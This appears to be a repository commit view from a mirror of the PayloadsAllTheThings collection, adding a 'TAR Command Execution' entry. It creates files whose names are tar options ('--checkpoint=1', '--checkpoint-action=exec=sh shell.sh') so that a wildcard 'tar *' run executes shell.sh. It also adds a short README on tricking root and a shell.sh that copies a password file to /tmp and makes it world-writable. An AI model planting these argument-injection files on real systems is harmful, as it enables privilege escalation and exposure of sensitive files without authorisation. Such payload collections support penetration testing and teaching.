weyne/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/weyne85/PayloadsAllTheThings.git synced 2025-10-29 16:57:02 +00:00
Code Issues Packages Projects Releases Wiki Activity

Tar command exec

Browse Source
This commit is contained in:
swisskyrepo
2016-10-18 18:36:18 +07:00
parent 22b68979b4
commit bed3967509
5 changed files with 14 additions and 9 deletions
Download Patch File Download Diff File Expand all files Collapse all files

0
TAR_Code_Exec/--checkpoint-action=exec=sh shell.sh Executable file
View File

0
TAR_Code_Exec/--checkpoint=1 Executable file
View File

14
TAR_Code_Exec/README.md
View File

@@ -1,12 +1,14 @@
# Title
Lorem
# TAR Command Execution
By using tar with checkpoint-action options, a specified action can be used after a checkpoint. This action could be a malicious shell script that could be used for executing arbitrary commands under the user who starts tar. “Tricking” root to use the specific options is quite easy, and thats where the wildcard comes in handy.
## Vuln
## Exploit
These files work against a "tar *"
```
Code
--checkpoint=1
--checkpoint-action=exec=sh shell.sh
shell.sh (your exploit code is here)
```
## Thanks to
* Lorem
* Ipsum
*

3
TAR_Code_Exec/shell.sh Executable file
View File

@@ -0,0 +1,3 @@
#!/bin/bash
cat /passwd > /tmp/flag
chmod 777 /tmp/flag